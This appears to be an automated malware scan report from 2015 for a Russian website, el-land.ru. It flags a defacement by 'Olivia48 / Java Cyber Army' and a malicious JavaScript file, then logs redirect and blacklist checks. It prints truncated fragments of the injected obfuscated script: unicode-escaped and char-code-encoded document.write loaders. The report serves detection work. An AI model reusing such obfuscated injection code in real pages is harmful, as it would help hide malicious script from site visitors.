Scanned pages/files
Request | Server response | Status |
http://el-land.ru/ | 200 OK Content-Length: 19903 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) document.write('\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u006C\u0061\u006E\u0067\u0075\u0061\u0067\u0065\u003D\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003E\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0077\u0072\u0069\u0074\u0065\u0028\u0075\u006E\u0065\u0073\u0063\u0061\u0070\u0065\u0028\u0027\u0025\u0033\u0043\u0025\u0037\u0033\u0025\u0036\u0033\u0025\u0037\u0032\u0025\u0036\u0039\u0025\u0037\u0030\u0025\u0037\u0034\u0025\u0032\u0030\u0025\u0036\u0043\u00 Antivirus reports:
Deface/Content modification. The following signature was found: This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we ...[506 bytes skipped]... n" class="no-js"> <link rel="shortcut icon" href="http://i.imgur.com/QYUFm5u.png"> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>--|olivia48|--</title> <META NAME="description" CONTENT="This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we'll do whatever we can,we mightn't use a weapon but We'll use stronger tools it's Our brains"> <META NAME="keywords" CONTENT="This Site Has Been Hacked by Olivia48, Hacked by Olivia48, Defaced by Olivia48, Olivia48 Was Here, Olivia48, Single Attacker, BlackHat, Hacker, Thief, ******, Defacer, Vuln, Inject, Leakforums, Maintenance"> <META NAME="robot" CONTENT="JAVA CYBER ARMY"> <META NAME="copyright" C ...[18932 bytes skipped]... | ||
http://el-land.ru/logs/content/ | 200 OK Content-Length: 54619 Content-Type: text/html | clean |
http://el-land.ru/logs/content/aopkcn44.js | 200 OK Content-Length: 3282 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function iuy(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!62!13!10!118!97!114!32!107!101!121!32!61!32!100!111!99!117!109!101!110!116!46!103!101!116!69!108!101!109!101!110!116!66!121!73!100!40!39!116!111!112!39!41!46!102!105!114!115!116!67!104!105!108!100!46!110!111!100!101!86!97!108!117!101!59!13!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!34!60!100!105!118!32!97!108!105!103!110!6 Antivirus reports:
| ||
http://el-land.ru/logs/content/razdel.php?pid | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://el-land.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173209 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173205 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173202 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173158 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173128 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173115 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173057 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173041 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173017 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813172953 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: el-land.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0
Connection: close
Date: Thu, 11 Jun 2015 21:43:00 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 11 Jun 2015 21:43:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: google_adv2=0; expires=Thu, 23-Jul-2015 13:43:00 GMT
Set-Cookie: d2fb1624cb281074625429e88fbd8c6a=7b916117f5b281023e8820cc9f868b4a; path=/
GET / HTTP/1.1
Host: el-land.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0
Connection: close
Date: Thu, 11 Jun 2015 21:43:00 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 11 Jun 2015 21:43:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: google_adv2=0; expires=Thu, 23-Jul-2015 13:43:00 GMT
Set-Cookie: d2fb1624cb281074625429e88fbd8c6a=7b916117f5b281023e8820cc9f868b4a; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: el-land.ru
Referer: http://www.google.com/search?q=el-land.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: el-land.ru
Referer: http://www.google.com/search?q=el-land.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=el-land.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://el-land.ru/
Result: el-land.ru is not infected or malware details are not published yet.
Result: el-land.ru is not infected or malware details are not published yet.